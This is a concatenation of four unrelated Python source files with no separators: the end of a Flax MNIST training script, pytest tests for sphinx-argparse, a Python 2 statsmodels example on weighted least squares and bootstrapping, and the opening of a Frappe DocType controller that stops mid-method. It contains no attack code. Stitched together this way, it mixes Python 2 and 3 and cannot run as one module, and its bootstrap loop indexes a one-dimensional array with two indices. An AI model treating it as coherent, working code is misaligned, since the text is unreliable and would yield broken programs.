      logging.info("%s: Epoch %d in %0.2f sec", FlaxMNIST.name, epoch,
                   epoch_time)
      logging.info("%s: Training set accuracy %0.2f%%", FlaxMNIST.name,
                   100. * train_acc)
      logging.info("%s: Test set accuracy %0.2f%%", FlaxMNIST.name,
                   100. * test_acc)

    # See discussion in README.md for packaging Flax models for conversion
    predict_fn = functools.partial(FlaxMNIST.predict,
                                   with_classifier=with_classifier)
    params = optimizer.target
    return (predict_fn, params)


def plot_images(ds,
                nr_rows: int,
                nr_cols: int,
                title: str,
                inference_fn: Optional[Callable] = None):
  """Plots a grid of images with their predictions.

  Params:
    ds: a tensorflow dataset from where to pick the images and labels.
    nr_rows, nr_cols: the size of the grid to plot
    title: the title of the plot
    inference_fn: if None then print the existing label, else use this
      function on the batch of images to produce a batch of inference
      results, which get printed.
  """
  count = nr_rows * nr_cols
  fig = plt.figure(figsize=(8., 4.), num=title)

  # Get the first batch
  (images, labels), = list(tfds.as_numpy(ds.take(1)))
  if inference_fn:
    inferred_labels = inference_fn(images)

  for i, image in enumerate(images[:count]):
    digit = fig.add_subplot(nr_rows, nr_cols, i + 1)
    if inference_fn:
      digit_title = f"infer: {np.argmax(inferred_labels[i])}\n"
    else:
      digit_title = ""
    digit_title += f"label: {np.argmax(labels[i])}"
    digit.set_title(digit_title)
    plt.imshow(
        (np.reshape(image, (28, 28)) * 255).astype(np.uint8),
        interpolation="nearest")
  plt.show()
"""Tests for sphinx-argparse's ``parse_parser`` / ``parser_navigate``.

Each test builds an ``argparse.ArgumentParser``, converts it with
``parse_parser`` and asserts on the resulting dict structure.

NOTE(review): the expected ``usage``/``bare_usage`` strings embed the
program name ``py.test``, i.e. argparse's default prog derived from
sys.argv[0] -- these tests assume they are run via the py.test entry
point.
"""
import argparse
from sphinxarg.parser import parse_parser, parser_navigate
import six


def test_parse_options():
    # Optional flags land in the first action group; a missing help
    # string is normalized to ''.
    parser = argparse.ArgumentParser()
    parser.add_argument('--foo', action='store_true', default=False, help='foo help')
    parser.add_argument('--bar', action='store_true', default=False)
    data = parse_parser(parser)

    assert data['action_groups'][0]['options'] == [
        {
            'name': ['--foo'],
            'default': False,
            'help': 'foo help'
        },
        {
            'name': ['--bar'],
            'default': False,
            'help': ''
        }
    ]


def test_parse_default():
    # String defaults are rendered wrapped in double quotes.
    parser = argparse.ArgumentParser()
    parser.add_argument('--foo', default='123')
    data = parse_parser(parser)

    assert data['action_groups'][0]['options'] == [
        {
            'name': ['--foo'],
            'default': '"123"',
            'help': ''
        }
    ]


def test_parse_arg_choices():
    # choices on a positional argument are carried through verbatim.
    parser = argparse.ArgumentParser()
    parser.add_argument('move', choices=['rock', 'paper', 'scissors'])
    data = parse_parser(parser)

    assert data['action_groups'][0]['options'] == [
        {
            'name': ['move'],
            'help': '',
            'choices': ['rock', 'paper', 'scissors'],
            'default': None
        }
    ]


def test_parse_opt_choices():
    # choices on an optional argument are carried through verbatim.
    parser = argparse.ArgumentParser()
    parser.add_argument('--move', choices=['rock', 'paper', 'scissors'])
    data = parse_parser(parser)

    assert data['action_groups'][0]['options'] == [
        {
            'name': ['--move'],
            'default': None,
            'help': '',
            'choices': ['rock', 'paper', 'scissors']
        }
    ]


def test_parse_default_skip_default():
    # skip_default_values=True replaces defaults with the SUPPRESS marker.
    parser = argparse.ArgumentParser()
    parser.add_argument('--foo', default='123')
    data = parse_parser(parser, skip_default_values=True)

    assert data['action_groups'][0]['options'] == [
        {
            'name': ['--foo'],
            'default': '==SUPPRESS==',
            'help': ''
        }
    ]


def test_parse_positional():
    # Positionals keep their (non-string) defaults unquoted.
    parser = argparse.ArgumentParser()
    parser.add_argument('foo', default=False, help='foo help')
    parser.add_argument('bar', default=False)
    data = parse_parser(parser)

    assert data['action_groups'][0]['options'] == [
        {
            'name': ['foo'],
            'help': 'foo help',
            'default': False
        },
        {
            'name': ['bar'],
            'help': '',
            'default': False
        }
    ]


def test_parse_description():
    # Parser-level description and epilog are surfaced at the top level.
    parser = argparse.ArgumentParser(description='described', epilog='epilogged')
    parser.add_argument('foo', default=False, help='foo help')
    parser.add_argument('bar', default=False)
    data = parse_parser(parser)

    assert data['description'] == 'described'
    assert data['epilog'] == 'epilogged'
    assert data['action_groups'][0]['options'] == [
        {
            'name': ['foo'],
            'help': 'foo help',
            'default': False
        },
        {
            'name': ['bar'],
            'help': '',
            'default': False
        }
    ]


def test_parse_nested():
    # Subparsers appear under 'children' with their own action groups
    # and usage strings.
    parser = argparse.ArgumentParser()
    parser.add_argument('foo', default=False, help='foo help')
    parser.add_argument('bar', default=False)

    subparsers = parser.add_subparsers()

    subparser = subparsers.add_parser('install', help='install help')
    subparser.add_argument('ref', type=str, help='foo1 help')
    subparser.add_argument('--upgrade', action='store_true', default=False, help='foo2 help')

    data = parse_parser(parser)

    assert data['action_groups'][0]['options'] == [
        {
            'name': ['foo'],
            'help': 'foo help',
            'default': False
        },
        {
            'name': ['bar'],
            'help': '',
            'default': False
        }
    ]

    assert data['children'] == [
        {
            'name': 'install',
            'help': 'install help',
            'usage': 'usage: py.test install [-h] [--upgrade] ref',
            'bare_usage': 'py.test install [-h] [--upgrade] ref',
            'action_groups': [
                {
                    'title': 'Positional Arguments',
                    'description': None,
                    'options': [
                        {
                            'name': ['ref'],
                            'help': 'foo1 help',
                            'default': None
                        }
                    ]
                },
                {
                    'description': None,
                    'title': 'Named Arguments',
                    'options': [
                        {
                            'name': ['--upgrade'],
                            'default': False,
                            'help': 'foo2 help'
                        }
                    ]
                }
            ]
        }
    ]


# Subparser aliases are a Python 3 only argparse feature, hence the guard.
if six.PY3:
    def test_parse_nested_with_alias():
        # An aliased subcommand keeps a separate display 'name' and
        # canonical 'identifier'.
        parser = argparse.ArgumentParser()
        parser.add_argument('foo', default=False, help='foo help')
        parser.add_argument('bar', default=False)

        subparsers = parser.add_subparsers()

        subparser = subparsers.add_parser('install', aliases=['i'], help='install help')
        subparser.add_argument('ref', type=str, help='foo1 help')
        subparser.add_argument('--upgrade', action='store_true', default=False, help='foo2 help')

        data = parse_parser(parser)

        assert data['action_groups'][0]['options'] == [
            {
                'name': ['foo'],
                'help': 'foo help',
                'default': False
            },
            {
                'name': ['bar'],
                'help': '',
                'default': False
            }
        ]

        assert data['children'] == [
            {
                'name': 'install (i)',
                'identifier': 'install',
                'help': 'install help',
                'usage': 'usage: py.test install [-h] [--upgrade] ref',
                'bare_usage': 'py.test install [-h] [--upgrade] ref',
                'action_groups': [
                    {
                        'title': 'Positional Arguments',
                        'description': None,
                        'options': [
                            {
                                'name': ['ref'],
                                'help': 'foo1 help',
                                'default': None
                            }
                        ]
                    },
                    {
                        'description': None,
                        'title': 'Named Arguments',
                        'options': [
                            {
                                'name': ['--upgrade'],
                                'default': False,
                                'help': 'foo2 help'
                            }
                        ]
                    }
                ]
            }
        ]

    def test_aliased_traversal():
        # parser_navigate resolves by identifier even when the display
        # name includes the alias suffix.
        parser = argparse.ArgumentParser()

        subparsers1 = parser.add_subparsers()
        subparsers1.add_parser('level1', aliases=['l1'])

        data = parse_parser(parser)

        data2 = parser_navigate(data, 'level1')

        assert(data2 == {
            'bare_usage': 'py.test level1 [-h]',
            'help': '',
            'usage': 'usage: py.test level1 [-h]',
            'name': 'level1 (l1)',
            'identifier': 'level1'})


def test_parse_nested_traversal():
    # parser_navigate walks a space-separated subcommand path; the empty
    # path returns the root structure unchanged.
    parser = argparse.ArgumentParser()

    subparsers1 = parser.add_subparsers()
    subparser1 = subparsers1.add_parser('level1')

    subparsers2 = subparser1.add_subparsers()
    subparser2 = subparsers2.add_parser('level2')

    subparsers3 = subparser2.add_subparsers()
    subparser3 = subparsers3.add_parser('level3')

    subparser3.add_argument('foo', help='foo help')
    subparser3.add_argument('bar')

    data = parse_parser(parser)

    data3 = parser_navigate(data, 'level1 level2 level3')

    assert data3['action_groups'][0]['options'] == [
        {
            'name': ['foo'],
            'help': 'foo help',
            'default': None
        },
        {
            'name': ['bar'],
            'help': '',
            'default': None
        }
    ]

    data2 = parser_navigate(data, 'level1 level2')

    assert data2['children'] == [
        {
            'name': 'level3',
            'help': '',
            'usage': 'usage: py.test level1 level2 level3 [-h] foo bar',
            'bare_usage': 'py.test level1 level2 level3 [-h] foo bar',
            'action_groups': [
                {
                    'title': 'Positional Arguments',
                    'description': None,
                    'options': [
                        {
                            'default': None,
                            'name': ['foo'],
                            'help': 'foo help'
                        },
                        {
                            'name': ['bar'],
                            'help': '',
                            'default': None
                        }
                    ]
                }
            ]
        }
    ]

    assert data == parser_navigate(data, '')


def test_fill_in_default_prog():
    """
    Ensure that %(default)s and %(prog)s are getting properly filled in inside
    help=''
    """
    parser = argparse.ArgumentParser(prog='test_fill_in_default_prog')
    parser.add_argument('bar', default='foo', help='%(prog)s (default: %(default)s)')
    data = parse_parser(parser)

    assert data['action_groups'][0]['options'] == [
        {
            'default': '"foo"',
            'name': ['bar'],
            'help': 'test_fill_in_default_prog (default: "foo")'
        }
    ]


def test_string_quoting():
    """
    If an optional argument has a string type and a default, then the default should
    be in quotes. This prevents things like '--optLSFConf=-q short' when
    '--optLSFConf="-q short"' is correct.
    """
    parser = argparse.ArgumentParser(prog='test_string_quoting_prog')
    parser.add_argument('--bar', default='foo bar', help='%(prog)s (default: %(default)s)')
    data = parse_parser(parser)

    assert data['action_groups'][0]['options'] == [
        {
            'default': '"foo bar"',
            'name': ['--bar'],
            'help': 'test_string_quoting_prog (default: "foo bar")'
        }
    ]


def test_parse_groups():
    # Explicit argument groups become additional action groups, after
    # the default 'Named Arguments' group.
    parser = argparse.ArgumentParser()
    parser.add_argument('--foo', action='store_true', default=False, help='foo help')
    parser.add_argument('--bar', action='store_true', default=False)

    optional = parser.add_argument_group('Group 1')
    optional.add_argument("--option1", help='option #1')
    optional.add_argument("--option2", help='option #2')

    data = parse_parser(parser)

    assert data['action_groups'] == [
        {
            'description': None,
            'options': [
                {'default': False, 'help': 'foo help', 'name': ['--foo']},
                {'default': False, 'help': '', 'name': ['--bar']}],
            'title': 'Named Arguments'},
        {
            'description': None,
            'options': [
                {'default': None, 'help': 'option #1', 'name': ['--option1']},
                {'default': None, 'help': 'option #2', 'name': ['--option2']}],
            'title': 'Group 1'
        }
    ]


def test_action_groups_with_subcommands():
    """
    This is a somewhat overly complicated example incorporating both action
    groups (with optional AND positional arguments) and subcommands (again
    with both optional and positional arguments)
    """
    parser = argparse.ArgumentParser('foo')
    subparsers = parser.add_subparsers()
    parserA = subparsers.add_parser('A', help='A subparser')
    parserA.add_argument('baz', type=int, help='An integer')
    parserB = subparsers.add_parser('B', help='B subparser')
    parserB.add_argument('--barg', choices='XYZ', help='A list of choices')

    parser.add_argument('--foo', help='foo help')
    parser.add_argument('foo2', metavar='foo2 metavar', help='foo2 help')

    grp1 = parser.add_argument_group('bar options')
    grp1.add_argument('--bar', help='bar help')
    grp1.add_argument('quux', help='quux help')

    grp2 = parser.add_argument_group('bla options')
    grp2.add_argument('--blah', help='blah help')
    grp2.add_argument('sniggly', help='sniggly help')

    data = parse_parser(parser)

    assert data['action_groups'] == [
        {'options': [{'default': None, 'name': ['foo2 metavar'],
                      'help': 'foo2 help'}],
         'description': None, 'title': 'Positional Arguments'},
        {'options': [{'default': None, 'name': ['--foo'],
                      'help': 'foo help'}],
         'description': None, 'title': 'Named Arguments'},
        {'options': [{'default': None, 'name': ['--bar'], 'help': 'bar help'},
                     {'default': None, 'name': ['quux'], 'help': 'quux help'}],
         'description': None, 'title': 'bar options'},
        {'options': [{'default': None, 'name': ['--blah'], 'help': 'blah help'},
                     {'default': None, 'name': ['sniggly'], 'help': 'sniggly help'}],
         'description': None, 'title': 'bla options'}
    ]

    assert data['children'] == [
        {'usage': 'usage: foo A [-h] baz',
         'action_groups': [{'options': [{'default': None, 'name': ['baz'],
                                         'help': 'An integer'}],
                            'description': None,
                            'title': 'Positional Arguments'}],
         'bare_usage': 'foo A [-h] baz',
         'name': 'A',
         'help': 'A subparser'},
        {'usage': 'usage: foo B [-h] [--barg {X,Y,Z}]',
         'action_groups': [{'options': [{'default': None,
                                         'choices': 'XYZ',
                                         'name': ['--barg'],
                                         'help': 'A list of choices'}],
                            'description': None,
                            'title': 'Named Arguments'}],
         'bare_usage': 'foo B [-h] [--barg {X,Y,Z}]',
         'name': 'B',
         'help': 'B subparser'}
    ]
""" Example: scikits.statsmodels.WLS example is extended to look at the meaning of rsquared in WLS, at outliers, compares with RLM and a short bootstrap """ import numpy as np import scikits.statsmodels as sm import matplotlib.pyplot as plt data = sm.datasets.ccard.load() data.exog = sm.add_constant(data.exog) ols_fit = sm.OLS(data.endog, data.exog).fit() # perhaps the residuals from this fit depend on the square of income incomesq = data.exog[:,2] plt.scatter(incomesq, ols_fit.resid) plt.grid() # If we think that the variance is proportional to income**2 # we would want to weight the regression by income # the weights argument in WLS weights the regression by its square root # and since income enters the equation, if we have income/income # it becomes the constant, so we would want to perform # this type of regression without an explicit constant in the design #data.exog = data.exog[:,:-1] wls_fit = sm.WLS(data.endog, data.exog[:,:-1], weights=1/incomesq).fit() # This however, leads to difficulties in interpreting the post-estimation # statistics. Statsmodels does not yet handle this elegantly, but # the following may be more appropriate # explained sum of squares ess = wls_fit.uncentered_tss - wls_fit.ssr # rsquared rsquared = ess/wls_fit.uncentered_tss # mean squared error of the model mse_model = ess/(wls_fit.df_model + 1) # add back the dof of the constant # f statistic fvalue = mse_model/wls_fit.mse_resid # adjusted r-squared rsquared_adj = 1 -(wls_fit.nobs)/(wls_fit.df_resid)*(1-rsquared) #Trying to figure out what's going on in this example #---------------------------------------------------- #JP: I need to look at this again. Even if I exclude the weight variable # from the regressors and keep the constant in then the reported rsquared # stays small. Below also compared using squared or sqrt of weight variable. 
# TODO: need to add 45 degree line to graphs
wls_fit3 = sm.WLS(data.endog, data.exog[:,(0,1,3,4)], weights=1/incomesq).fit()
print wls_fit3.summary()
print 'corrected rsquared',
print (wls_fit3.uncentered_tss - wls_fit3.ssr)/wls_fit3.uncentered_tss
plt.figure()
plt.title('WLS dropping heteroscedasticity variable from regressors')
plt.plot(data.endog, wls_fit3.fittedvalues, 'o')
plt.xlim([0,2000])
plt.ylim([0,2000])
print 'raw correlation of endog and fittedvalues'
print np.corrcoef(data.endog, wls_fit.fittedvalues)
print 'raw correlation coefficient of endog and fittedvalues squared'
print np.corrcoef(data.endog, wls_fit.fittedvalues)[0,1]**2

# compare with robust regression,
# heteroscedasticity correction downweights the outliers
rlm_fit = sm.RLM(data.endog, data.exog).fit()
plt.figure()
plt.title('using robust for comparison')
plt.plot(data.endog, rlm_fit.fittedvalues, 'o')
plt.xlim([0,2000])
plt.ylim([0,2000])


#What is going on? A more systematic look at the data
#----------------------------------------------------

# two helper functions

def getrsq(fitresult):
    '''calculates rsquared residual, total and explained sums of squares

    Parameters
    ----------
    fitresult : instance of Regression Result class, or tuple of (resid, endog) arrays
        regression residuals and endogenous variable

    Returns
    -------
    rsquared
    residual sum of squares
    (centered) total sum of squares
    explained sum of squares (for centered)
    '''
    # Duck-type: accept either a fitted results object or a raw
    # (resid, endog) tuple.
    if hasattr(fitresult, 'resid') and hasattr(fitresult, 'model'):
        resid = fitresult.resid
        endog = fitresult.model.endog
        nobs = fitresult.nobs
    else:
        resid = fitresult[0]
        endog = fitresult[1]
        nobs = resid.shape[0]

    rss = np.dot(resid, resid)
    tss = np.var(endog)*nobs   # centered total sum of squares
    return 1-rss/tss, rss, tss, tss-rss


def index_trim_outlier(resid, k):
    '''returns indices to residual array with k outliers removed

    Parameters
    ----------
    resid : array_like, 1d
        data vector, usually residuals of a regression
    k : int
        number of outliers to remove

    Returns
    -------
    trimmed_index : array, 1d
        index array with k outliers removed
    outlier_index : array, 1d
        index array of k outliers

    Notes
    -----
    Outliers are defined as the k observations with the largest
    absolute values.
    '''
    sort_index = np.argsort(np.abs(resid))
    # index of non-outlier
    trimmed_index = np.sort(sort_index[:-k])
    outlier_index = np.sort(sort_index[-k:])
    return trimmed_index, outlier_index


#Comparing estimation results for ols, rlm and wls with and without outliers
#---------------------------------------------------------------------------

#ols_test_fit = sm.OLS(data.endog, data.exog).fit()
olskeep, olsoutl = index_trim_outlier(ols_fit.resid, 2)
print 'ols outliers', olsoutl, ols_fit.resid[olsoutl]
ols_fit_rm2 = sm.OLS(data.endog[olskeep], data.exog[olskeep,:]).fit()
rlm_fit_rm2 = sm.RLM(data.endog[olskeep], data.exog[olskeep,:]).fit()
#weights = 1/incomesq

results = [ols_fit, ols_fit_rm2, rlm_fit, rlm_fit_rm2]
#Note: I think incomesq is already square
for weights in [1/incomesq, 1/incomesq**2, np.sqrt(incomesq)]:
    print '\nComparison OLS and WLS with and without outliers'
    wls_fit0 = sm.WLS(data.endog, data.exog, weights=weights).fit()
    wls_fit_rm2 = sm.WLS(data.endog[olskeep], data.exog[olskeep,:],
                         weights=weights[olskeep]).fit()
    wlskeep, wlsoutl = index_trim_outlier(ols_fit.resid, 2)
    print '2 outliers candidates and residuals'
    # NOTE(review): this prints the module-level wls_fit residuals indexed
    # by the OLS outlier positions -- presumably wls_fit0.resid[wlsoutl]
    # was intended; confirm.
    print wlsoutl, wls_fit.resid[olsoutl]
    # redundant because ols and wls outliers are the same:
    ##wls_fit_rm2_ = sm.WLS(data.endog[wlskeep], data.exog[wlskeep,:],
    ##                      weights=1/incomesq[wlskeep]).fit()

    print 'outliers ols, wls:', olsoutl, wlsoutl

    print 'rsquared'
    print 'ols vs ols rm2', ols_fit.rsquared, ols_fit_rm2.rsquared
    print 'wls vs wls rm2', wls_fit0.rsquared, wls_fit_rm2.rsquared #, wls_fit_rm2_.rsquared
    print 'compare R2_resid versus R2_wresid'
    print 'ols minus 2', getrsq(ols_fit_rm2)[0],
    print getrsq((ols_fit_rm2.wresid, ols_fit_rm2.model.wendog))[0]
    print 'wls ', getrsq(wls_fit)[0],
    print getrsq((wls_fit.wresid, wls_fit.model.wendog))[0]
    print 'wls minus 2', getrsq(wls_fit_rm2)[0],
    # next is same as wls_fit_rm2.rsquared for cross checking
    print getrsq((wls_fit_rm2.wresid, wls_fit_rm2.model.wendog))[0]
    #print getrsq(wls_fit_rm2_)[0],
    #print getrsq((wls_fit_rm2_.wresid, wls_fit_rm2_.model.wendog))[0]
    results.extend([wls_fit0, wls_fit_rm2])

print ' ols ols_rm2 rlm rlm_rm2 wls (lin) wls_rm2 (lin) wls (squ) wls_rm2 (squ) wls (sqrt) wls_rm2 (sqrt)'
print 'Parameter estimates'
print np.column_stack([r.params for r in results])
print 'R2 original data, next line R2 weighted data'
print np.column_stack([getattr(r, 'rsquared', None) for r in results])
print 'Standard errors'
print np.column_stack([getattr(r, 'bse', None) for r in results])
print 'Heteroscedasticity robust standard errors (with ols)'
print 'with outliers'
print np.column_stack([getattr(ols_fit, se, None) for se in ['HC0_se', 'HC1_se', 'HC2_se', 'HC3_se']])

# Reference output kept for comparison (inert string literal, never used):
'''
 ols ols_rm2 rlm rlm_rm2 wls (lin) wls_rm2 (lin) wls (squ) wls_rm2 (squ) wls (sqrt) wls_rm2 (sqrt)

Parameter estimates
[[  -3.08181404   -5.06103843   -4.98510966   -5.34410309   -2.69418516
    -3.1305703    -1.43815462   -1.58893054   -3.57074829   -6.80053364]
 [ 234.34702702  115.08753715  129.85391456  109.01433492  158.42697752
   128.38182357   60.95113284  100.25000841  254.82166855  103.75834726]
 [ -14.99684418   -5.77558429   -6.46204829   -4.77409191   -7.24928987
    -7.41228893    6.84943071   -3.34972494  -16.40524256   -4.5924465 ]
 [  27.94090839   85.46566835   89.91389709   95.85086459   60.44877369
    79.7759146    55.9884469    60.97199734   -3.8085159    84.69170048]
 [-237.1465136    39.51639838  -15.50014814   31.39771833 -114.10886935
   -40.04207242   -6.41976501  -38.83583228 -260.72084271  117.20540179]]

R2 original data, next line R2 weighted data
[[ 0.24357792  0.31745994  0.19220308  0.30527648  0.22861236  0.3112333
   0.06573949  0.29366904  0.24114325  0.31218669]]
[[ 0.24357791  0.31745994  None  None  0.05936888  0.0679071
   0.06661848  0.12769654  0.35326686  0.54681225]]

-> R2 with weighted data is jumping all over

standard errors
[[   5.51471653    3.31028758    2.61580069    2.39537089    3.80730631
     2.90027255    2.71141739    2.46959477    6.37593755    3.39477842]
 [  80.36595035   49.35949263   38.12005692   35.71722666   76.39115431
    58.35231328   87.18452039   80.30086861   86.99568216   47.58202096]
 [   7.46933695    4.55366113    3.54293763    3.29509357    9.72433732
     7.41259156   15.15205888   14.10674821    7.18302629    3.91640711]
 [  82.92232357   50.54681754   39.33262384   36.57639175   58.55088753
    44.82218676   43.11017757   39.31097542   96.4077482    52.57314209]
 [ 199.35166485  122.1287718    94.55866295   88.3741058   139.68749646
   106.89445525  115.79258539  105.99258363  239.38105863  130.32619908]]

robust standard errors (with ols)
with outliers
      HC0_se         HC1_se       HC2_se        HC3_se'
[[   3.30166123    3.42264107    3.4477148     3.60462409]
 [  88.86635165   92.12260235   92.08368378   95.48159869]
 [   6.94456348    7.19902694    7.19953754    7.47634779]
 [  92.18777672   95.56573144   95.67211143   99.31427277]
 [ 212.9905298   220.79495237  221.08892661  229.57434782]]

removing 2 outliers
[[  2.57840843   2.67574088   2.68958007   2.80968452]
 [ 36.21720995  37.58437497  37.69555106  39.51362437]
 [  3.1156149    3.23322638   3.27353882   3.49104794]
 [ 50.09789409  51.98904166  51.89530067  53.79478834]
 [ 94.27094886  97.82958699  98.25588281 102.60375381]]
'''


# a quick bootstrap analysis
# --------------------------
#
#(I didn't check whether this is fully correct statistically)

nobs, nvar = data.exog.shape
niter = 2000
bootres = np.zeros((niter, nvar*2))
for it in range(niter):
    # resample observations with replacement
    rind = np.random.randint(nobs, size=nobs)
    endog = data.endog[rind]
    exog = data.exog[rind,:]
    res = sm.OLS(endog, exog).fit()
    bootres[it, :nvar] = res.params
    bootres[it, nvar:] = res.bse

np.set_printoptions(linewidth=200)
print 'Bootstrap Results of parameters and parameter standard deviation OLS'
print 'Parameter estimates'
print 'median', np.median(bootres[:,:5], 0)
print 'mean ', np.mean(bootres[:,:5], 0)
print 'std ', np.std(bootres[:,:5], 0)
print 'Standard deviation of parameter estimates'
print 'median', np.median(bootres[:,5:], 0)
print 'mean ', np.mean(bootres[:,5:], 0)
print 'std ', np.std(bootres[:,5:], 0)

plt.figure()
for i in range(4):
    plt.subplot(2,2,i+1)
    plt.hist(bootres[:,i],50)
    plt.title('var%d'%i)
plt.figtext(0.5, 0.935, 'OLS Bootstrap',
            ha='center', color='black', weight='bold', size='large')

# Same bootstrap for WLS on the sample with the 2 OLS outliers removed.
data_endog = data.endog[olskeep]
data_exog = data.exog[olskeep,:]
incomesq_rm2 = incomesq[olskeep]

nobs, nvar = data_exog.shape
niter = 500 # a bit slow
bootreswls = np.zeros((niter, nvar*2))
for it in range(niter):
    rind = np.random.randint(nobs, size=nobs)
    endog = data_endog[rind]
    exog = data_exog[rind,:]
    # NOTE(review): BUG -- incomesq is 1-d, so incomesq[rind,:] raises
    # IndexError, and the weights should come from the trimmed sample:
    # almost certainly intended weights=1/incomesq_rm2[rind]
    # (incomesq_rm2 is defined above and otherwise unused).
    res = sm.WLS(endog, exog, weights=1/incomesq[rind,:]).fit()
    bootreswls[it, :nvar] = res.params
    bootreswls[it, nvar:] = res.bse

print 'Bootstrap Results of parameters and parameter standard deviation',
print 'WLS removed 2 outliers from sample'
print 'Parameter estimates'
print 'median', np.median(bootreswls[:,:5], 0)
print 'mean ', np.mean(bootreswls[:,:5], 0)
print 'std ', np.std(bootreswls[:,:5], 0)
print 'Standard deviation of parameter estimates'
print 'median', np.median(bootreswls[:,5:], 0)
print 'mean ', np.mean(bootreswls[:,5:], 0)
print 'std ', np.std(bootreswls[:,5:], 0)

plt.figure()
for i in range(4):
    plt.subplot(2,2,i+1)
    plt.hist(bootreswls[:,i],50)
    plt.title('var%d'%i)
plt.figtext(0.5, 0.935, 'WLS rm2 Bootstrap',
            ha='center', color='black', weight='bold', size='large')

#plt.show()
#plt.close('all')

# Sample run output and author's conclusions (inert string literal):
'''
The following a random variables not fixed by a seed

Bootstrap Results of parameters and parameter standard deviation
OLS

Parameter estimates
median [  -3.26216383  228.52546429  -14.57239967   34.27155426 -227.02816597]
mean   [  -2.89855173  234.37139359  -14.98726881   27.96375666 -243.18361746]
std    [   3.78704907   97.35797802    9.16316538   94.65031973  221.79444244]

Standard deviation of parameter estimates
median [   5.44701033   81.96921398    7.58642431   80.64906783  200.19167735]
mean   [   5.44840542   86.02554883    8.56750041   80.41864084  201.81196849]
std    [   1.43425083   29.74806562    4.22063268   19.14973277   55.34848348]

Bootstrap Results of parameters and parameter standard deviation
WLS removed 2 outliers from sample

Parameter estimates
median [  -3.95876112  137.10419042   -9.29131131   88.40265447  -44.21091869]
mean   [  -3.67485724  135.42681207   -8.7499235    89.74703443  -46.38622848]
std    [   2.96908679   56.36648967    7.03870751   48.51201918  106.92466097]

Standard deviation of parameter estimates
median [   2.89349748   59.19454402    6.70583332   45.40987953  119.05241283]
mean   [   2.97600894   60.14540249    6.92102065   45.66077486  121.35519673]
std    [   0.55378808   11.77831934    1.69289179    7.4911526    23.72821085]



Conclusion: problem with outliers and possibly heteroscedasticity
-----------------------------------------------------------------

in bootstrap results

* bse in OLS underestimates the standard deviation of the parameters
  compared to standard deviation in bootstrap
* OLS heteroscedasticity corrected standard errors for the original
  data (above) are close to bootstrap std
* using WLS with 2 outliers removed has a relatively good match between
  the mean or median bse and the std of the parameter estimates in the
  bootstrap

We could also include rsquared in bootstrap, and do it also for RLM.
The problems could also mean that the linearity assumption is violated,
e.g. try non-linear transformation of exog variables, but linear in
parameters.


for statsmodels

* In this case rsquared for original data looks less random/arbitrary.
* Don't change definition of rsquared from centered tss to uncentered
  tss when calculating rsquared in WLS if the original exog contains
  a constant. The increase in rsquared because of a change in definition
  will be very misleading.
* Whether there is a constant in the transformed exog, wexog, or not,
  might affect also the degrees of freedom calculation, but I haven't
  checked this. I would guess that the df_model should stay the same,
  but needs to be verified with a textbook.
* df_model has to be adjusted if the original data does not have a
  constant, e.g. when regressing an endog on a single exog variable
  without constant. This case might require also a redefinition of
  the rsquare and f statistic for the regression anova to use the
  uncentered tss.
  This can be done through keyword parameter to model.__init__ or
  through autodedection with hasconst = (exog.var(0)<1e-10).any()
  I'm not sure about fixed effects with a full dummy set but
  without a constant. In this case autodedection wouldn't work this
  way. Also, I'm not sure whether a ddof keyword parameter can also
  handle the hasconst case.
'''
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt

from __future__ import unicode_literals

import six
import re, copy, os
import frappe
from frappe import _
from frappe.utils import now, cint
from frappe.model import no_value_fields, default_fields
from frappe.model.document import Document
from frappe.custom.doctype.property_setter.property_setter import make_property_setter
from frappe.desk.notifications import delete_notification_count_for
from frappe.modules import make_boilerplate
from frappe.model.db_schema import validate_column_name, validate_column_length, type_map
from frappe.model.docfield import supports_translation
import frappe.website.render

# imports - third-party imports
import pymysql
from pymysql.constants import ER

class InvalidFieldNameError(frappe.ValidationError): pass

form_grid_templates = {
	"fields": "templates/form_grid/fields.html"
}

class DocType(Document):
	# Controller for the "DocType" meta-doctype: validates schema changes
	# and synchronizes the database / controller files on update.

	def get_feed(self):
		# Feed label for the activity stream: just the DocType name.
		return self.name

	def validate(self):
		"""Validate DocType before saving.

		- Check if developer mode is set.
		- Validate series
		- Check fieldnames (duplication etc)
		- Clear permission table for child tables
		- Add `amended_from` and `amended_by` if Amendable"""
		self.check_developer_mode()

		self.validate_name()

		# Single and child-table doctypes cannot be imported/submitted.
		if self.issingle:
			self.allow_import = 0
			self.is_submittable = 0
			self.istable = 0

		elif self.istable:
			self.allow_import = 0
			self.permissions = []

		self.scrub_field_names()
		self.set_default_in_list_view()
		self.set_default_translatable()
		self.validate_series()
		self.validate_document_type()
		validate_fields(self)

		if self.istable:
			# no permission records for child table
			self.permissions = []
		else:
			validate_permissions(self)

		self.make_amendable()
		self.validate_website()

		# Snapshot the stored document so on_update hooks (e.g.
		# sync_global_search) can diff against the pre-save state.
		# NOTE(review): the two identical `if not self.is_new()` guards
		# below could be merged; kept separate here to preserve behavior.
		if not self.is_new():
			self.before_update = frappe.get_doc('DocType', self.name)

		if not self.is_new():
			self.setup_fields_to_fetch()

		if self.default_print_format and not self.custom:
			frappe.throw(_('Standard DocType cannot have default print format, use Customize Form'))

	def set_default_in_list_view(self):
		'''Set default in-list-view for first 4 mandatory fields'''
		# Only applies when no field has been explicitly marked in_list_view.
		if not [d.fieldname for d in self.fields if d.in_list_view]:
			cnt = 0
			for d in self.fields:
				if d.reqd and not d.hidden and not d.fieldtype == "Table":
					d.in_list_view = 1
					cnt += 1
					if cnt == 4: break

	def set_default_translatable(self):
		'''Ensure that non-translatable never will be translatable'''
		for d in self.fields:
			if d.translatable and not supports_translation(d.fieldtype):
				d.translatable = 0

	def check_developer_mode(self):
		"""Throw exception if not developer mode or via patch"""
		if frappe.flags.in_patch or frappe.flags.in_test:
			return

		if not frappe.conf.get("developer_mode") and not self.custom:
			frappe.throw(_("Not in Developer Mode! Set in site_config.json or make 'Custom' DocType."))

	def setup_fields_to_fetch(self):
		'''Setup query to update values for newly set fetch values'''
		try:
			# NOTE(review): frappe.get_meta is given a Document rather than
			# a doctype name here -- confirm this is the intended call form.
			old_meta = frappe.get_meta(frappe.get_doc('DocType', self.name), cached=False)
			old_fields_to_fetch = [df.fieldname for df in old_meta.get_fields_to_fetch()]
		except frappe.DoesNotExistError:
			old_fields_to_fetch = []

		new_meta = frappe.get_meta(self, cached=False)

		self.flags.update_fields_to_fetch_queries = []

		# Build one backfill UPDATE per newly added fetch-from field; the
		# queries are executed later by update_fields_to_fetch().
